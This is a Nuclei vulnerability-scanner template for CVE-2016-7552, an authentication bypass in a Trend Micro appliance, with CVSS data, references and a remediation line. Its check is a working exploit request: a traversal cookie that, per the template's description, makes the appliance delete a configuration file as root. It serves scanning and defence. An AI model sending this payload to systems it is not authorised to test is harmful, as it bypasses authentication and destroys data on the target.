nuclei-templates/http/cves/2016/CVE-2016-7552.yaml

46 lines
1.5 KiB
YAML

id: CVE-2016-7552
info:
name: Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass
author: dwisiswant0
severity: critical
description: Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS.
remediation: |
Apply the necessary patch or update provided by Trend Micro to fix the authentication bypass vulnerability.
reference:
- https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4
- https://nvd.nist.gov/vuln/detail/CVE-2016-7552
- https://github.com/rapid7/metasploit-framework/pull/8216/commits/0f07875a2ddb0bfbb4e985ab074e9fc56da1dcf6
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2016-7552
cwe-id: CWE-22
epss-score: 0.97004
epss-percentile: 0.99647
cpe: cpe:2.3:a:trendmicro:threat_discovery_appliance:2.6.1062:r1:*:*:*:*:*:*
metadata:
max-request: 1
vendor: trendmicro
product: threat_discovery_appliance
tags: msf,cve,cve2016,lfi,auth,bypass
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/logoff.cgi"
headers:
Cookie: "session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Memory map"
- type: status
status:
- 200